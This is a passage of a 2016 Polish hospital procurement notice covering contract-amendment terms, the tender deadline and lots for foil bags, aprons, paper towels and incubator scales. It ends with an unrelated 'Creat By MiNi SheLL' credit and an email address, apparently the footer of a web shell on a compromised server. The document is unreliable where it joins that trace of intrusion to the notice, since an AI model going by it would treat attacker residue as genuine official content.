2.5	aneks dopuszczający zmianę  oznaczenia  przedmiotu umowy w zakresie nazwy wyrobu  przy zachowaniu jego parametrów, nie zmieniający  ceny  jednostkowej  i wartości umowy,

2.6	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,

2.7	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron,

Uwaga ! Postanowienia ust. 2 pkt. 2.1, pkt. 2.2 i pkt. 2.4  nie dotyczą Części Nr 1.

3.	Zasady wprowadzania zmian wysokości wynagrodzenia należnego Wykonawcy, określone w postanowieniach  ust. 2 pkt. 2.1,  pkt. 2.2  i  pkt. 2.3.

Warunkiem wprowadzenia zmian jest potwierdzenie powstania okoliczności w formie opisowej i ich właściwe umotywowanie. Na Wykonawcy spoczywa obowiązek wykazania  wpływu  zmiany stawki podatku od towarów i usług , wysokości minimalnego wynagrodzenia czy zmiany składek na ubezpieczenie na zwiększenie kosztów realizacji umowy będących podstawą do zwaloryzowania wynagrodzenia umownego w drodze aneksu do umowy.
4.	W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem.

Z  uwzględnieniem  zapisu  art.  144  ust. 1  ustawy  Zamawiający  przewiduje  możliwość  dokonania  istotnych  zmian  postanowień  zawartej  umowy  w  stosunku  do  treści  oferty,  na  podstawie  której  dokonano  wyboru Wykonawcy  oraz  określa  warunki  tych  zmian  poprzez  wprowadzenie  do  zawartej  umowy  następujących  aneksów;
a.	aneks  w  zakresie  wymiany / uzupełnienia  elementów  składowych  sprzętu  w  sytuacji  gdy  wprowadzony  zostanie  do  sprzedaży  przez  Wykonawcę  produkt  zmodyfikowany / udoskonalony  oraz  w  przypadku  zaistnienia  konieczności  wymiany/uzupełnienia  elementów  składowych   sprzętu  w  związku  z  postępem  technologicznym,
b.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
c.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron,
d.	aneks w przypadku zmiany powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lun faktycznego.
W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzp.gpsk.ump.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GPSK UM w Poznaniu, ul.Polna 33 - Dział Zamówień Publicznych, Budynek E, pokój nr 104 lub pod adresem poczty elektronicznej gczekalska@gpsk.ump.edu.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2016 godzina 09:00, miejsce: Siedziba Zamawiającego w Poznaniu, ul. Polna 33 - Kancelaria Ogólna, Budynek D, pokój nr 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Worki foliowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worki foliowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Worki strunowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Worki strunowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Fartuchy foliowe niesterylne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuchy foliowe niesterylne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dozowniki oraz ręczniki papierowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozowniki oraz ręczniki papierowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.17.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wagi elektroniczne do inkubatora Giraffe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wagi elektroniczne do inkubatora Giraffe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.31.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com